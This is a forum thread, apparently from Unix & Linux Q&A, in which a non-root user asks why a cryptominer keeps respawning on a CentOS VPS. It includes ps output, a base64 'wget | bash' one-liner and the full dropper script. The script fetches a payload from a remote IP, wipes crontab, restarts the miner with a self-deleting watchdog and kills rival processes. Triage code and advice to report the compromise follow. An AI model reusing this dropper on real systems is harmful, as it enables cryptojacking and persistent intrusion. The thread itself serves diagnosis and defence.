Centos – process keeps on starting

Tags: centos, cron, malware

On a VPS that I use, somehow I got a little annoying miner. (I'm not root)

    15109 ?        Z      0:00 [sh] <defunct>
    15134 ?        Ssl    0:03 []
    15160 ?        S      0:00 ./5DiaEd75 ./bNlMGMON
    15162 ?        S      0:00 ./5DiaEd75 ./bnkI202h
    15183 ?        S      0:00 sleep 5
    15184 ?        S      0:00 sleep 5

Every time it starts with a different name from /var/tmp.
As far as I have seen, it downloads a file from transfer.sh (later edit: the script is the one from transfer.sh, I thought it was the site) sometime after I kill it (this I saw from stalking ps x).

    47067 ?        S      0:00 sh -c echo -n 'd2dldCAtcSAtTyAtIGh0dHA6Ly8yMDQuNDguMjQuNzIvaW5kZXguaHRtbCB8IGJhc2g=' | base64 -d | bash
    47070 ?        S      0:00 bash
    47072 ?        S      0:00 bash
    47088 ?        S      0:00 wget http://204.48.24.72/zeenuts -O ./0amdpE5K

I checked the crontab, but there is nothing there and if I put something there it gets deleted after that process starts.
Before this thing starts, I also see a:

    27985 ?        S      0:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t -f root

I can't get rid of this thing.
Is there a way that it sets a cron-like job without using crontab? Or using the sendmail function?
For the [] process, lsof says it runs from /; it also downloads 2 executables into /var/tmp.

The /usr/sbin/sendmail might not be related, as I noticed that it starts whenever I set a command in crontab and it gets executed. Might be a setting the admin made for crontab jobs.

    2.6.32-642.el6.x86_64
    CentOS release 6.8 (Final)

I saw the script:

    #<!--

    function random() {
    chars=abcdefghijklmnop1234567890ABCDEFGHIJKLMNOP
    for i in {1..8} ; do
    echo -n ${chars:RANDOM%${#chars}:1}
    done
    }

    new_bash=$(random)
    new_daemon=$(random)
    new_killbot=$(random)
    new_payload=$(random)
    crontab -r   # wipes the user's crontab (why entries keep vanishing)

    writable_path=("/var/tmp" "/tmp" `pwd`)

    # probe each candidate directory by copying and running touch there
    for install_path in ${writable_path[@]}
    do
        cd $install_path

        rm -rf touch ponezz

        cp `command -v touch` ./touch
        ./touch ./ponezz
        if [ ! -f ./ponezz ]; then
            continue
        else
            rm -rf touch ponezz
            break
        fi
    done

    # fetch the payload with whatever downloader is available
    if [ $(command -v wget | wc -l) -eq 1 ]; then
        wget http://204.48.24.72/zeenuts -O ./$new_payload
    elif [ $(command -v curl | wc -l) -eq 1 ]; then
        curl http://204.48.24.72/zeenuts -o ./$new_payload
    elif [ $(command -v python | wc -l) -eq 1 ]; then
        if [ $(python -V 2>&1 | sed 's/.* \([0-9]\).\([0-9]\).*/\1\2/') -lt "30" ]; then
            python -c "from urllib import urlretrieve; urlretrieve('http://204.48.24.72/zeenuts', './$new_payload')"
        else
            python -c "from urllib.request import urlretrieve; urlretrieve('http://204.48.24.72/zeenuts', './$new_payload')"
        fi
    fi
    chmod 777 ./$new_payload
    nohup ./$new_payload
    ./$new_payload

    # watchdog loop: deletes itself from disk, then restarts the payload whenever ps no longer shows a "[]" process
    echo "sleep 2;rm "'$0'" ;while true;do sleep 5; ps x | grep -F '[]' | grep -v grep;if [ "'$?'" -eq 1 ]; then chmod 777 ./$new_payload;nohup ./$new_payload;./$new_payload;fi;ps | grep -F '[]' | grep -v grep | awk '{print "'$1'"}' | awk '{if(NR>1)print}' | xargs -n1 kill -9;done" | tee ./$new_daemon
    # killbot: base64 of a loop that kill -9's any other process using more than 40% CPU
    echo -n 'c2xlZXAgMjtybSAkMCA7d2hpbGUgdHJ1ZTtkbyBzbGVlcCA1OyBwcyBhdXggfGdyZXAgLXYgLUYgJ1tdJyB8IGF3ayAne2lmKCQzPjQwLjApIHByaW50ICQyfScgfCB3aGlsZSByZWFkIHByb2NpZDsgZG8ga2lsbCAtOSAkcHJvY2lkOyBkb25lO2RvbmU=' | base64 -d | tee ./$new_killbot
    # both loops run under a randomly named copy of bash, so ps never shows "bash"
    cp `command -v bash` ./$new_bash

    ./$new_bash ./$new_daemon &
    ./$new_bash ./$new_killbot &

Fun little script, but I can't figure out how it keeps on starting.
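To see why the thing keeps returning, here is an added Python triage helper (not from the question or the answer) that decodes the base64 one-liners from the pasted ps output and flags the persistence tricks in the decoded scripts. The indicator names, the PAYLOAD placeholder in the reconstructed daemon script and the regexes are my own assumptions; the base64 blobs are the ones quoted in the question.

```python
#!/usr/bin/env python3
"""Decode the base64 commands seen in ps and flag why the miner keeps restarting:
the daemon script's `while true` loop relaunches the payload whenever ps no
longer shows the `[]` process, and both helper scripts unlink themselves."""
import base64
import re

# Copied from the ps output and the dropper script in the question.
PS_LINE = ("47067 ?  S  0:00 sh -c echo -n "
           "'d2dldCAtcSAtTyAtIGh0dHA6Ly8yMDQuNDguMjQuNzIvaW5kZXguaHRtbCB8IGJhc2g=' "
           "| base64 -d | bash")
KILLBOT_B64 = ("c2xlZXAgMjtybSAkMCA7d2hpbGUgdHJ1ZTtkbyBzbGVlcCA1OyBwcyBhdXggfGdyZXAgLXYgLUYg"
               "J1tdJyB8IGF3ayAne2lmKCQzPjQwLjApIHByaW50ICQyfScgfCB3aGlsZSByZWFkIHByb2Np"
               "ZDsgZG8ga2lsbCAtOSAkcHJvY2lkOyBkb25lO2RvbmU=")
# Constructed: what the `echo ... | tee ./$new_daemon` line writes to disk,
# with the random payload name replaced by PAYLOAD.
DAEMON_SCRIPT = ("sleep 2;rm $0 ;while true;do sleep 5; ps x | grep -F '[]' | grep -v grep;"
                 "if [ $? -eq 1 ]; then chmod 777 ./PAYLOAD;nohup ./PAYLOAD;./PAYLOAD;fi;"
                 "ps | grep -F '[]' | grep -v grep | awk '{print $1}' | awk '{if(NR>1)print}' "
                 "| xargs -n1 kill -9;done")

B64_IN_PS = re.compile(r"echo -n '([A-Za-z0-9+/=]+)'\s*\|\s*base64 -d")

INDICATORS = {  # name -> regex; names and heuristics are mine (assumed)
    "crontab_wipe": re.compile(r"\bcrontab -r\b"),              # explains vanishing cron entries
    "self_delete": re.compile(r"\brm\s+\$0\b"),                  # nothing left on disk to inspect
    "restart_watchdog": re.compile(r"while true.*nohup", re.S),  # relaunches the payload in a loop
    "process_killer": re.compile(r"\bkill -9\b"),                # kills duplicates or CPU-heavy rivals
    "renamed_interpreter": re.compile(r"cp\s+`command -v bash`"),  # bash copy under a random name
}


def decode_blob(b64):
    """Decode one base64 blob to text (undecodable bytes are replaced)."""
    return base64.b64decode(b64).decode("utf-8", "replace")


def decode_ps_base64(ps_line):
    """Return the command hidden in an `echo -n '<b64>' | base64 -d` ps entry, else None."""
    m = B64_IN_PS.search(ps_line)
    return decode_blob(m.group(1)) if m else None


def find_indicators(script):
    """Names of the persistence/evasion indicators present in a shell script."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


if __name__ == "__main__":
    for label, text in (("ps one-liner", decode_ps_base64(PS_LINE)),
                        ("killbot", decode_blob(KILLBOT_B64)),
                        ("daemon", DAEMON_SCRIPT)):
        print(f"== {label}\n{text}\n   indicators: {find_indicators(text)}")
```

The daemon script is the answer to "how does it keep starting": it is not cron at all, but a loop under a renamed bash that relaunches the payload every five seconds, so the whole process tree has to go at once and the machine's owner needs to be told.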

Best Answer

Since you are not the owner of, or admin on, the compromised machine, you should report this to the people that do own or administrate the machine. They have an ongoing security breach and they need to take immediate action.

It may be a "harmless" bitcoin miner, or it may well be that the bitcoin miner (if that is what it is) is the only process that you're able to spot. It does not matter; the machine is compromised and it should be taken off the Internet immediately.

Please also see


I've reported to DigitalOcean (to which the IP address in the base64-encoded string belongs) that this is happening, with a pointer to this U&L question.
